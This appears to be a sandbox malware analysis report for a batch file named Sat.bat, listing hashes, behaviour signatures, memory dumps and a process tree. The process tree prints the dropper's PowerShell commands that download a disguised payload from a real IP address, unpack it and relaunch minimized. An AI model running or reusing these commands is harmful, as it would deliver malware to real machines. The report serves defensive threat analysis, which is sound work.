Overview

overview

10

Static

static

1

Sat.bat

windows7-x64

10

Sat.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    23-11-2024 02:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Sat.bat

  • Size

    2KB

  • MD5

    0e2fff554ddadc58aaff7978ec06aa32

  • SHA1

    b453b17905235ea96150c90711285f7879d3afc0

  • SHA256

    64c79060f8478363e93ae210e0bd7ba9178fecdd1a0badba4fed5382180d3a80

  • SHA512

    c54cc4c956dc733835d0d40d49377b23b8b63bfa118e0e9ed5bba18e2b2b5f4a33656cd5b75230cd7dec05a98a3bc4b84b429121cffe3644fff72fc628b83b76

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://109.199.101.109:770/xx.jpg

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

    execution
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Sat.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2708
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\Sat.bat' -ArgumentList 'minimized' -WindowStyle Minimized"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2844
      • C:\Windows\system32\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Sat.bat" minimized "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2116
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://109.199.101.109:770/xx.jpg', 'C:\Users\Admin\Documents\x.zip')"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2920
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Expand-Archive -Path 'C:\Users\Admin\Documents\x.zip' -DestinationPath 'C:\Users\Admin\Documents'"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2608
        • C:\Windows\system32\timeout.exe
          timeout /t 5 /nobreak
          4⤵
          • Delays execution with timeout.exe
          PID:2204

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    ed23dc11d2d7bcdd2d9b9d88a6e0b3dd

    SHA1

    7a7f76c3de94bb3679967fc969377d24b09a611f

    SHA256

    a0f91f0c6416525d3c19f23d68b2c1df64931e5f1ee73de7fe55d3124fa4d496

    SHA512

    e8adc4a08d8450ddb0d5c4c080a145503db0e85f66df723631b5197202448b4e1410c826b1a386263fd7d047152db4d6dd8d369331f5058aee62bea5736daa55

    Download Submit

  • memory/2844-4-0x000007FEF55EE000-0x000007FEF55EF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2844-5-0x000000001B680000-0x000000001B962000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2844-6-0x0000000001E10000-0x0000000001E18000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2844-7-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2844-10-0x000000000226B000-0x00000000022D2000-memory.dmp

    Filesize

    412KB

    Download

  • memory/2844-11-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2844-9-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2844-8-0x0000000002264000-0x0000000002267000-memory.dmp

    Filesize

    12KB

    Download

  • memory/2920-17-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2920-18-0x00000000026A0000-0x00000000026A8000-memory.dmp

    Filesize

    32KB

    Download